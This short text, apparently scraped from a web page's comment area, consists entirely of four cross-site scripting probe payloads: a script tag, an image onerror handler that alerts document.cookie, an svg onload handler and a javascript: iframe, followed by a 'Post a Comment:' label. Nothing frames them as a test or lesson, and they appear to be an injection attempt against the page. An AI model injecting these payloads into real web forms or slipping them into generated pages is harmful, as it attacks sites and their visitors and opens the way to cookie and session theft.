<script>alert('XSS')</script>
<img src=x onerror=alert(document.cookie)>
<svg onload=alert(1)>
<iframe src="javascript:alert('XSS')">
Post a Comment: